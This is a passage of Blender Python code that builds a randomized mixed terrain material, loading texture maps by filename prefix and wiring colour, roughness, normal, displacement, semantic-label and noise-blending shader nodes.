mixed terrain material [blObject]
"""
# create random selection of terrains ##########################################################################
# list of terrain, which will be used
_channel_list = []
# deepcopy terrain list to alter it
_terrain_cfg_copy = copy.deepcopy(terrain_cfg)
# check if all terrains are supposed to be used
if num_max_mix_terrains >= 0:
# sample terrrains num_max_mix_terrains times
if num_max_mix_terrains == 0:
num_max_mix_terrains = 1
self._print_msg("Warning: adjusted num_max_mix_terrains!")
if num_min_mix_terrains <= 0:
num_min_mix_terrains = 1
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_min_mix_terrains > num_max_mix_terrains:
num_min_mix_terrains = num_max_mix_terrains
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_min_mix_terrains > len(_terrain_cfg_copy):
num_min_mix_terrains = len(_terrain_cfg_copy)
self._print_msg("Warning: adjusted num_min_mix_terrains!")
if num_max_mix_terrains <= len(_terrain_cfg_copy):
_num_terrain_samples = random.randint(num_min_mix_terrains,num_max_mix_terrains)
else:
_num_terrain_samples = random.randint(num_min_mix_terrains,len(_terrain_cfg_copy))
self._print_msg("Warning: adjusted num_max_mix_terrains!")
for jj in range(0,_num_terrain_samples):
# pick random sample
item = random.choice(_terrain_cfg_copy)
# add sample to terrain list
_channel_list.append(item)
# remove item, depending on sampling method
if not with_replacement:
_terrain_cfg_copy.remove(item)
else:
# take entire terrain list
_channel_list = _terrain_cfg_copy
################################################################### end of create random selection of terrains #
# raise warning if _channel_list is empty
if not _channel_list:
self._print_msg("Warning: _channel_list is empty!")
# create mixed terrain material and return result
return self._create_materials(general_terrain_cfg, material_name, _channel_list, hard_label_borders,\
noise_phase_shift_enabled, noise_phase_rate)
def _get_map_path(self, base_path, prefix):
""" function to get path to texture files
Args:
base_path: base path of textures [string]
prefix: keyword, which has to be part of filename [string]
Returns:
path to file [string]
"""
# search for file with prefix in it
_map_file = None
_map_file = [filename for filename in os.listdir(base_path) if prefix in filename]
# check if any file was found ##################################################################################
if _map_file == []:
# no file was found
_map_file = None
else:
# compose abs path
_map_file = os.path.join(base_path,_map_file[0])
########################################################################## end of check if any file was found #
# return found file
return _map_file
def _create_materials( self, general_terrain_cfg, material_name, material_cfg_list, hard_label_borders,
noise_phase_shift_enabled = False, noise_phase_rate = 0.0):
""" create mix terrain material.
Args:
general_terrain_cfg: sfafsaf
material_name:
material_cfg_list:
hard_label_borders:
noise_phase_shift_enabled:
noise_phase_rate:
Returns:
mixed terrain material [blObject]
"""
# define and prepare basic vars ################################################################################
# create new material
_terrain_material = bpy.data.materials.new(name=material_name)
# use nodes
_terrain_material.use_nodes = True
# house keeping
_terrain_material.node_tree.nodes.remove(_terrain_material.node_tree.nodes.get("Principled BSDF"))
# get all nodes
nodes = _terrain_material.node_tree.nodes
_terrain_material.cycles.displacement_method = 'BOTH'
# init nodePosBase
_node_offset = [0,0]
# current channel outputs
_latest_PBSDF_output = None
_latest_col_output = None
_latest_spec_output = None
_latest_rough_output = None
_latest_nrm_output = None
_latest_disp_output = None
_latest_label_output = None
# get material output node
_material_output = bpy.data.materials[material_name].node_tree.nodes["Material Output"]
_material_output.location = (_node_offset[0]+4300,_node_offset[1])
_noise_phase_shift_add_node = None
__noise_mapping_node_ist = []
_instance_switching_node_list = []
######################################################################### end of define and prepare basic vars #
# create mixed terrain material ################################################################################
for material_cfg in material_cfg_list:
# define map paths #########################################################################################
_col_map_path = None
_gloss_map_path = None
_rough_map_path = None
_spec_map_path = None
_refl_map_path = None
_normal_map_path = None
_disp_map_path = None
################################################################################## end of define map paths #
if not os.path.isabs(material_cfg['path']):
# create abs path
_current_path = os.path.dirname(__file__)
material_cfg['path'] = os.path.join(_current_path,"../../../",material_cfg['path'])
# get texture paths ########################################################################################
# get color map ############################################################################################
if (material_cfg['diffuse']):
_col_map_path = self._get_map_path(material_cfg['path'],"COL")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"col")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"DIFF")
if _col_map_path is None:
_col_map_path = self._get_map_path(material_cfg['path'],"diff")
if _col_map_path is None:
self._print_msg("WARNING: diffuse texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
##################################################################################### end of get color map #
# get reflectance map ######################################################################################
if (material_cfg['ref']):
_gloss_map_path = self._get_map_path(material_cfg['path'],"GLOSS")
if _gloss_map_path is None:
_gloss_map_path = self._get_map_path(material_cfg['path'],"gloss")
if _gloss_map_path is None:
_rough_map_path = self._get_map_path(material_cfg['path'],"rough")
if _rough_map_path is None:
_rough_map_path = self._get_map_path(material_cfg['path'],"rough")
if _rough_map_path is None:
self._print_msg("WARNING: roughness texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
############################################################################### end of get reflectance map #
# get specular map #########################################################################################
if (material_cfg['spec']):
_refl_map_path = self._get_map_path(material_cfg['path'],"REFL")
if _refl_map_path is None:
_refl_map_path = self._get_map_path(material_cfg['path'],"refl")
if _refl_map_path is None:
_spec_map_path = self._get_map_path(material_cfg['path'],"spec")
if _spec_map_path is None:
_spec_map_path = self._get_map_path(material_cfg['path'],"SPEC")
if _spec_map_path is None:
self._print_msg("WARNING: specular texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
################################################################################# end of get specular map #
# get normal map ###########################################################################################
if (material_cfg['normal']):
_normal_map_path = self._get_map_path(material_cfg['path'],"NRM")
if _normal_map_path is None:
_normal_map_path = self._get_map_path(material_cfg['path'],"nrm")
if _normal_map_path is None:
_normal_map_path = self._get_map_path(material_cfg['path'],"nor")
if _normal_map_path is None:
self._print_msg("WARNING: normal texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
#################################################################################### end of get normal map #
# get displacement map #####################################################################################
if (material_cfg['displacement']):
_disp_map_path = self._get_map_path(material_cfg['path'],"DISP")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"HEIGHT")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"disp")
if _disp_map_path is None:
_disp_map_path = self._get_map_path(material_cfg['path'],"height")
if _disp_map_path is None:
self._print_msg("WARNING: displacement texture in folder " + material_cfg['path'] + \
" cannot be found! Using default color!")
############################################################################## end of get displacement map #
################################################################################# end of get texture paths #
# get tiling parameter #####################################################################################
if 'imageTileX' in material_cfg:
imageTileX = material_cfg['imageTileX']
else:
imageTileX = 1.0
if 'imageTileY' in material_cfg:
imageTileY = material_cfg['imageTileY']
else:
imageTileY = 1.0
if 'size' in material_cfg:
imageSize = material_cfg['size']
else:
imageSize = 1.0
if 'mosaicRotation' in material_cfg:
mosaicRotation = material_cfg['mosaicRotation']
mosaicNoise = material_cfg['mosaicNoise']
else:
mosaicRotation = 0.0
mosaicNoise = 0.0
############################################################################## end of get tiling parameter #
# create texture for each channel ##########################################################################
# create DIFFUSE texture channel ###########################################################################
# load image and create basic shader #######################################################################
# check if image is already in use for other material
_current_col_output = None
if _col_map_path is not None:
if _col_map_path in self._texture_dict:
# reuse image
_img = self._texture_dict[_col_map_path]
else:
# load image
_img = bpy.data.images.load(_col_map_path)
self._texture_dict[_col_map_path] = _img
# create image shader node
_rgb_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_rgb_image.location = (_node_offset[0]-470,_node_offset[1]+400)
# use loaded image
_rgb_image.image = _img
# store current last col node
_current_col_output = _rgb_image
################################################################ end of load image and create basic shader #
# create color adjustemt if needed #########################################################################
if "colorAdjustment" in material_cfg:
# create RGB curve node
_color_adjustment_curve = _terrain_material.node_tree.nodes.new('ShaderNodeRGBCurve')
_color_adjustment_curve.location = (_node_offset[0],_node_offset[1]+400)
# read in and adjust color ramp ########################################################################
# brigthess adjustment
if "cColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["cColorPoints"]):
_color_adjustment_curve.mapping.curves[3].points.new(point[0],point[1])
# red adjustment
if "rColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["rColorPoints"]):
_color_adjustment_curve.mapping.curves[0].points.new(point[0],point[1])
# green adjustment
if "gColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["gColorPoints"]):
_color_adjustment_curve.mapping.curves[1].points.new(point[0],point[1])
# blue adjustment
if "bColorPoints" in material_cfg["colorAdjustment"]:
for point_Idx, point in enumerate(material_cfg["colorAdjustment"]["bColorPoints"]):
_color_adjustment_curve.mapping.curves[2].points.new(point[0],point[1])
################################################################# end of read in and adjust color ramp #
# update color curve
_color_adjustment_curve.mapping.update()
# link rgb image to curve
_terrain_material.node_tree.links.new(_color_adjustment_curve.inputs[1],_current_col_output.outputs[0])
# change color output reference
_current_col_output = _color_adjustment_curve
################################################################## end of create color adjustemt if needed #
# add color variations if needed ###########################################################################
if "colorVariation" in material_cfg:
# create saturation node
_color_variation_node = _terrain_material.node_tree.nodes.new('ShaderNodeHueSaturation')
_color_variation_node.location = (_node_offset[0]+400,_node_offset[1]+200)
# read in and adjust ramp ##############################################################################
if "hue" in material_cfg["colorVariation"]:
_color_variation_node.inputs[0].default_value = material_cfg["colorVariation"]["hue"]
if "saturation" in material_cfg["colorVariation"]:
_color_variation_node.inputs[1].default_value = material_cfg["colorVariation"]["saturation"]
if "brithness" in material_cfg["colorVariation"]:
_color_variation_node.inputs[2].default_value = material_cfg["colorVariation"]["brithness"]
####################################################################### end of read in and adjust ramp #
# create merging noise for color variation
_color_variation_noise_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexNoise")
_color_variation_noise_node.location = (_node_offset[0]+400,_node_offset[1]+700)
_color_variation_noise_node.noise_dimensions = '2D'
# read in and adjust noise #############################################################################
if "mergingNoiseScale" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[2].default_value =\
material_cfg["colorVariation"]["mergingNoiseScale"]
if "mergingNoiseDetail" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[3].default_value =\
material_cfg["colorVariation"]["mergingNoiseDetail"]
if "mergingNoiseRoughness" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[4].default_value =\
material_cfg["colorVariation"]["mergingNoiseRoughness"]
if "mergingNoiseDistorion" in material_cfg["colorVariation"]:
_color_variation_noise_node.inputs[5].default_value =\
material_cfg["colorVariation"]["mergingNoiseDistorion"]
###################################################################### end of read in and adjust noise #
# create color ramp for variation ######################################################################
if material_cfg["colorVariation"]["mergingcolorRampActivated"]:
_merging_color_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_merging_color_ramp_node.color_ramp.elements[0].color =\
( material_cfg["colorVariation"]["mergingColorStopColor_0"][0],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][1],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][2],\
material_cfg["colorVariation"]["mergingColorStopColor_0"][3])
_merging_color_ramp_node.color_ramp.elements[0].position =\
material_cfg["colorVariation"]["mergingColorStopPosition_0"]
_merging_color_ramp_node.color_ramp.elements[1].color =\
( material_cfg["colorVariation"]["mergingColorStopColor_1"][0],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][1],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][2],\
material_cfg["colorVariation"]["mergingColorStopColor_1"][3])
_merging_color_ramp_node.color_ramp.elements[1].position =\
material_cfg["colorVariation"]["mergingColorStopPosition_1"]
_merging_color_ramp_node.location = (_node_offset[0]+800,_node_offset[1]+700)
_color_variation_mix_node = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
_color_variation_mix_node.location = (_node_offset[0]+1200,_node_offset[1]+400)
if "mergingMode" in material_cfg["colorVariation"]:
_color_variation_mix_node.blend_type = material_cfg["colorVariation"]["mergingMode"]
############################################################### end of create color ramp for variation #
# link it ##############################################################################################
_terrain_material.node_tree.links.new( _color_variation_node.inputs[4],
_current_col_output.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[1],
_current_col_output.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[2],
_color_variation_node.outputs[0])
if material_cfg["colorVariation"]["mergingcolorRampActivated"]:
_terrain_material.node_tree.links.new( _merging_color_ramp_node.inputs[0],
_color_variation_noise_node.outputs[0])
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[0],
_merging_color_ramp_node.outputs[0])
else:
_terrain_material.node_tree.links.new( _color_variation_mix_node.inputs[0],
_color_variation_noise_node.outputs[0])
####################################################################################### end of link it #
# update current last color output reference
_current_col_output = _color_variation_mix_node
#################################################################### end of add color variations if needed #
if not _current_col_output:
# provide default rgb value
_col_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_col_default.location = (_node_offset[0]-470,_node_offset[1]+400)
_col_default.outputs[0].default_value[0] = 0.5
_col_default.outputs[0].default_value[1] = 0.5
_col_default.outputs[0].default_value[2] = 0.5
_col_default.outputs[0].default_value[3] = 1.0
_current_col_output = _col_default
#################################################################### end of create DIFFUSE texture channel #
# create ROUGHNESS texture channel #########################################################################
_current_rough_output = None
# use roughness or glossy map ##############################################################################
if _rough_map_path is not None:
# check if image is already in use for other material
if _rough_map_path in self._texture_dict:
_img = self._texture_dict[_rough_map_path]
else:
_img = bpy.data.images.load(_rough_map_path)
self._texture_dict[_rough_map_path] = _img
# create image shader node #############################################################################
_roughness_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_roughness_image.image = _img
_roughness_image.image.colorspace_settings.name = 'Non-Color'
_roughness_image.location = (_node_offset[0]-470,_node_offset[1]-200)
###################################################################### end of create image shader node #
# update current last roughness node
_current_rough_output = _roughness_image
else:
# create GLOSSY texture shader
# TODO rename ref_map to glossy_map
# check if image is already in use for other material
if _gloss_map_path is not None:
if _gloss_map_path in self._texture_dict:
_img = self._texture_dict[_gloss_map_path]
else:
_img = bpy.data.images.load(_gloss_map_path)
self._texture_dict[_gloss_map_path] = _img
# create image shader node #########################################################################
_glossy_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_glossy_image.image = _img
_glossy_image.image.colorspace_settings.name = 'Non-Color'
_glossy_image.location = (_node_offset[0]-470,_node_offset[1]-200)
################################################################## end of create image shader node #
# create invert map
_invert_node = _terrain_material.node_tree.nodes.new('ShaderNodeInvert')
_invert_node.location = (_node_offset[0]-200,_node_offset[1]-200)
# link nodes
_terrain_material.node_tree.links.new(_invert_node.inputs[1],_glossy_image.outputs[0])
# update current last roughness node
_current_rough_output = _invert_node
################################################################### end of use roughness or glossy map #
################################################################## end of create ROUGHNESS texture channel #
# create SPECULAR texture channel ##########################################################################
_current_spec_output = None
if not _current_rough_output:
if _spec_map_path is not None:
if _spec_map_path in self._texture_dict:
_img = self._texture_dict[_spec_map_path]
else:
_img = bpy.data.images.load(_spec_map_path)
self._texture_dict[_spec_map_path] = _img
# create image shader node #########################################################################
_specular_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_specular_image.image = _img
_specular_image.image.colorspace_settings.name = 'Non-Color'
_specular_image.location = (_node_offset[0]-470,_node_offset[1]+100)
################################################################## end of create image shader node #
# create invert map
_invert_node = _terrain_material.node_tree.nodes.new('ShaderNodeInvert')
_invert_node.location = (_node_offset[0]-200,_node_offset[1]+100)
# link nodes
_terrain_material.node_tree.links.new(_invert_node.inputs[1],_specular_image.outputs[0])
# update current last spec node
_current_spec_output = _invert_node
else:
# TODO: add reflectance code here!
pass
if not _current_rough_output and not _current_spec_output:
# provide default rgb value
_glossy_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_glossy_default.location = (_node_offset[0]-470,_node_offset[1]-200)
_glossy_default.outputs[0].default_value[0] = 0.5
_glossy_default.outputs[0].default_value[1] = 0.5
_glossy_default.outputs[0].default_value[2] = 0.5
_glossy_default.outputs[0].default_value[3] = 1.0
_current_rough_output = _glossy_default
################################################################### end of create SPECULAR texture channel #
# create NORMAL image texture channel ######################################################################
_current_nrm_output = None
if _normal_map_path is not None:
# check if image is already in use for other material
if _normal_map_path in self._texture_dict:
_img = self._texture_dict[_normal_map_path]
else:
_img = bpy.data.images.load(_normal_map_path)
self._texture_dict[_normal_map_path] = _img
# create image shader node #############################################################################
_normal_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_normal_image.image = _img
_normal_image.image.colorspace_settings.name = 'Non-Color'
_normal_image.location = (_node_offset[0]-470,_node_offset[1]-500)
###################################################################### end of create image shader node #
# update current last normal node
_current_nrm_output = _normal_image
if not _current_nrm_output:
# provide default rgb value
_nrm_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_nrm_default.location = (_node_offset[0]-470,_node_offset[1]-500)
_nrm_default.outputs[0].default_value[0] = 0.5
_nrm_default.outputs[0].default_value[1] = 0.5
_nrm_default.outputs[0].default_value[2] = 0.5
_nrm_default.outputs[0].default_value[3] = 1.0
_current_nrm_output = _nrm_default
############################################################## end of create NORMAL image texture channel #
# create DISPLACEMENT image texture channel ################################################################
_current_disp_output = None
if _disp_map_path is not None:
# check if image is already in use for other material
if _disp_map_path in self._texture_dict:
_img = self._texture_dict[_disp_map_path]
else:
_img = bpy.data.images.load(_disp_map_path)
self._texture_dict[_disp_map_path] = _img
# create image shader node #############################################################################
_disp_image = _terrain_material.node_tree.nodes.new('ShaderNodeTexImage')
_disp_image.image = _img
_disp_image.image.colorspace_settings.name = 'Non-Color'
_disp_image.location = (_node_offset[0],_node_offset[1]-700)
###################################################################### end of create image shader node #
# add color ramp node ##################################################################################
dispColorRampNode = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
if "dispStrength" in material_cfg:
_disp_strength = material_cfg["dispStrength"]
material_cfg['dispColorStopPosition_0'] = 0.0
material_cfg['dispColorStopPosition_1'] = 1.0
material_cfg['dispColorStopColor_0'] = [0.0,0.0,0.0,1.0]
material_cfg['dispColorStopColor_1'] = [_disp_strength,_disp_strength,_disp_strength,1.0]
dispColorRampNode.color_ramp.elements[0].color = ( material_cfg['dispColorStopColor_0'][0],\
material_cfg['dispColorStopColor_0'][1],\
material_cfg['dispColorStopColor_0'][2],\
material_cfg['dispColorStopColor_0'][3])
dispColorRampNode.color_ramp.elements[0].position = material_cfg['dispColorStopPosition_0']
dispColorRampNode.color_ramp.elements[1].color = ( material_cfg['dispColorStopColor_1'][0],\
material_cfg['dispColorStopColor_1'][1],\
material_cfg['dispColorStopColor_1'][2],\
material_cfg['dispColorStopColor_1'][3])
dispColorRampNode.color_ramp.elements[1].position = material_cfg['dispColorStopPosition_1']
dispColorRampNode.location = (_node_offset[0]+400,_node_offset[1]-700)
########################################################################### end of add color ramp node #
# link it
_terrain_material.node_tree.links.new(dispColorRampNode.inputs[0], _disp_image.outputs[0])
# update current last disü node
_current_disp_output = dispColorRampNode
if not _current_disp_output:
# provide default rgb value
_disp_default = _terrain_material.node_tree.nodes.new('ShaderNodeRGB')
_disp_default.location = (_node_offset[0],_node_offset[1]-700)
_disp_default.outputs[0].default_value[0] = 0.5
_disp_default.outputs[0].default_value[1] = 0.5
_disp_default.outputs[0].default_value[2] = 0.5
_disp_default.outputs[0].default_value[3] = 1.0
_current_disp_output = _disp_default
#########################################
################################################################### end of create texture for each channel #
# create mapping nodes for tiling textures #################################################################
# TODO change!
mat_config = self.load_nodegroup_config("uber_mapping")
node_group = self.create_nodegroup_from_config(mat_config)
_mapping_node = _terrain_material.node_tree.nodes.new(type='ShaderNodeGroup')
_mapping_group = node_group
# custom_mapping
_mapping_node.node_tree = _mapping_group
_mapping_node.name = _mapping_group.name
_mapping_node.location = (_node_offset[0]-700,_node_offset[1])
_mapping_node.inputs[1].default_value = imageSize
_mapping_node.inputs[6].default_value = mosaicRotation
_mapping_node.inputs[7].default_value = mosaicNoise
_tex_coord_node = _terrain_material.node_tree.nodes.new('ShaderNodeTexCoord')
_tex_coord_node.location = (_node_offset[0]-900,_node_offset[1])
_terrain_material.node_tree.links.new(_mapping_node.inputs[0], _tex_coord_node.outputs[0])
if _col_map_path is not None:
_terrain_material.node_tree.links.new(_rgb_image.inputs[0], _mapping_node.outputs[0])
if _spec_map_path is not None:
_terrain_material.node_tree.links.new(_specular_image.inputs[0], _mapping_node.outputs[0])
if _gloss_map_path is not None:
_terrain_material.node_tree.links.new(_glossy_image.inputs[0], _mapping_node.outputs[0])
if _rough_map_path is not None:
_terrain_material.node_tree.links.new(_roughness_image.inputs[0], _mapping_node.outputs[0])
if _normal_map_path is not None:
_terrain_material.node_tree.links.new(_normal_image.inputs[0], _mapping_node.outputs[0])
if _disp_map_path is not None:
_terrain_material.node_tree.links.new(_disp_image.inputs[0], _mapping_node.outputs[0])
########################################################## end of create mapping nodes for tiling textures #
# setup semantic nodes #####################################################################################
_label_node, self._label_ID_node = self.create_semantic_nodes( \
node_tree=_terrain_material,
num_label_per_channel=self._num_labels_per_channel,
label_ID_vec=material_cfg['passParams']\
['semantic_label']['labelIDVec'][0],
uv_map = _mapping_node.outputs[0],
node_offset=[_node_offset[0]-500, _node_offset[1]-1700])
# set default value
_label_node.inputs[0].default_value=1
############################################################################## end of setup semantic nodes #
# setup instance nodes #####################################################################################
# define default label ID vector
# TODO: this parameter should be able to be overwitten
_label_ID_vec = [0]
# create switching nodes for semantics
_instance_switching_node = self.create_single_semantic_node(\
node_tree=_terrain_material,
label_ID=_label_ID_vec[0],
num_label_per_channel=15,
node_offset=[_node_offset[0], _node_offset[1]-2000])
# link switching nodes with tree
_terrain_material.node_tree.links.new(_instance_switching_node.inputs[1], _label_node.outputs[0])
# update _instance_switching_node_list list
_instance_switching_node_list.append(_instance_switching_node)
# update current last output
_label_node = _instance_switching_node
############################################################################## end of setup instance nodes #
# mix current with last texture ############################################################################
if _latest_col_output == None:
# if no last texture is set, set current to last texture
_latest_col_output = _current_col_output
_latest_rough_output = _current_rough_output
_latest_spec_output = _current_spec_output
_latest_nrm_output = _current_nrm_output
_latest_disp_output = _current_disp_output
_latest_label_output = _label_node
else:
# create noise shader to mix terrains ##################################################################
# add new noise shader
_noise_tex_coord_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexCoord")
_noise_tex_coord_node.location = (_node_offset[0]+600,_node_offset[1]-100)
_noise_mapping_node = _terrain_material.node_tree.nodes.new("ShaderNodeMapping")
_noise_mapping_node.location = (_node_offset[0]+1400,_node_offset[1]-100)
_noise_tex_node = _terrain_material.node_tree.nodes.new("ShaderNodeTexNoise")
_noise_tex_node.location = (_node_offset[0]+1800,_node_offset[1]-100)
_noise_color_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_noise_color_ramp_node.location = (_node_offset[0]+2200,_node_offset[1]-100)
if hard_label_borders:
_noise_color_label_ramp_node = _terrain_material.node_tree.nodes.new("ShaderNodeValToRGB")
_noise_color_label_ramp_node.location = (_node_offset[0]+2200,_node_offset[1]+200)
_noise_color_label_ramp_node.color_ramp.interpolation = 'CONSTANT'
# fill in noise values #################################################################################
_noise_tex_node.inputs[2].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Scale'][0],\
general_terrain_cfg['mergingNoise']['Scale'][-1])
_noise_tex_node.inputs[3].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Detail'][0],\
general_terrain_cfg['mergingNoise']['Detail'][-1])
_noise_tex_node.inputs[4].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Roughness'][0],\
general_terrain_cfg['mergingNoise']['Roughness'][-1])
_noise_tex_node.inputs[5].default_value = \
random.uniform(general_terrain_cfg['mergingNoise']['Distortion'][0],\
general_terrain_cfg['mergingNoise']['Distortion'][-1])
########################################################################## end of fill in noise values #
# even split of rgb textures
_noise_color_ramp_node.color_ramp.elements[0].position = 0.48
_noise_color_ramp_node.color_ramp.elements[1].position = 0.52
# calculate split of label noise split
if hard_label_borders:
middleSlot = 0.5*(_noise_color_ramp_node.color_ramp.elements[1].position + \
_noise_color_ramp_node.color_ramp.elements[0].position)
_noise_color_label_ramp_node.color_ramp.elements[0].position = middleSlot
_noise_color_label_ramp_node.color_ramp.elements[1].position = middleSlot+0.00001
# TODO: improve radnom sampling
_noise_mapping_node.inputs[2].default_value[0] = random.random()
_noise_mapping_node.inputs[2].default_value[1] = random.random()
_noise_mapping_node.inputs[2].default_value[2] = random.random()
##################################################
__noise_mapping_node_ist.append(_noise_mapping_node)
# link noise nodes #####################################################################################
_terrain_material.node_tree.links.new(_noise_mapping_node.inputs[0], _noise_tex_coord_node.outputs[0])
#_terrain_material.node_tree.links.new(_noise_mapping_node.inputs[0], _noise_tex_coord_node.outputs[2])
_terrain_material.node_tree.links.new(_noise_tex_node.inputs[0], _noise_mapping_node.outputs[0])
_terrain_material.node_tree.links.new(_noise_color_ramp_node.inputs[0], _noise_tex_node.outputs[0])
if hard_label_borders:
_terrain_material.node_tree.links.new( _noise_color_label_ramp_node.inputs[0],\
_noise_tex_node.outputs[0])
############################################################################## end of link noise nodes #
########################################################### end of create noise shader to mix terrains #
## COLOR MIX ####################################################################################
# add new mix shaders
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+200)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_col_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_col_output.outputs[0])
# set new output
_latest_col_output = mixShaderNode
####################################################################################
## SPEC MIX ####################################################################################
# add new mix shaders
if _latest_spec_output is None:
_latest_spec_output = _current_spec_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+500)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_spec_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_spec_output.outputs[0])
# set new output
_latest_spec_output = mixShaderNode
####################################################################################
## ROUGHNESS MIX ####################################################################################
# add new mix shaders
if _latest_rough_output is None:
_latest_rough_output = _current_rough_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+800)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_rough_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_rough_output.outputs[0])
# set new output
_latest_rough_output = mixShaderNode
####################################################################################
## NRM MIX ####################################################################################
# add new mix shaders
if _latest_nrm_output is None:
_latest_nrm_output = _current_nrm_output
else:
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+3500,_node_offset[1]+1100)
# combine shaders
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_nrm_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _current_nrm_output.outputs[0])
# set new output
_latest_nrm_output = mixShaderNode
####################################################################################
## LABEL MIX ####################################################################################
# add new mix shaders
mixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixShaderNode.location = (_node_offset[0]+2500,_node_offset[1]+300)
# combine shaders
if hard_label_borders:
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_label_ramp_node.outputs[0])
else:
_terrain_material.node_tree.links.new(mixShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[1], _latest_label_output.outputs[0])
_terrain_material.node_tree.links.new(mixShaderNode.inputs[2], _label_node.outputs[0])
# set new output
_latest_label_output = mixShaderNode
####################################################################################
# DISPLACEMENT MIX ####################################################################################
if _latest_disp_output is None:
_latest_disp_output = _current_disp_output
else:
mixDISPShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixRGB")
mixDISPShaderNode.location = (_node_offset[0]+2800,_node_offset[1]+300)
# combine shaders
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[0], _noise_color_ramp_node.outputs[0])
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[1], _latest_disp_output.outputs[0])
_terrain_material.node_tree.links.new(mixDISPShaderNode.inputs[2], _current_disp_output.outputs[0])
# set new output
_latest_disp_output = mixDISPShaderNode
####################################################################################
# adapt base position
_node_offset[1] = _node_offset[1] - 3000
##################################################################### end of mix current with last texture #
######################################################################### end of create mixed terrain material #
# TODO: the z component of the mapping node does not allow values creater than 20000!!!!! Better change to 4D mapping!
if (noise_phase_shift_enabled):
# create phase shift driver nodes
noisePhaseShiftOffset = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftOffset.location = (_node_offset[0]+700,_node_offset[1]-300)
noisePhaseShiftOffset.outputs[0].default_value = random.random()
noisePhaseShiftRate = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftRate.location = (_node_offset[0]+700,_node_offset[1]-500)
noisePhaseShiftRate.outputs[0].default_value = noise_phase_rate
noisePhaseShiftFrame = _terrain_material.node_tree.nodes.new("ShaderNodeValue")
noisePhaseShiftFrame.name = "frameID"
noisePhaseShiftFrame.location = (_node_offset[0]+700,_node_offset[1]-700)
noisePhaseShiftFrame.outputs[0].default_value = 0
# add logic ##########################################
noisePhaseShiftMultipleNode = _terrain_material.node_tree.nodes.new("ShaderNodeMath")
noisePhaseShiftMultipleNode.operation = 'MULTIPLY'
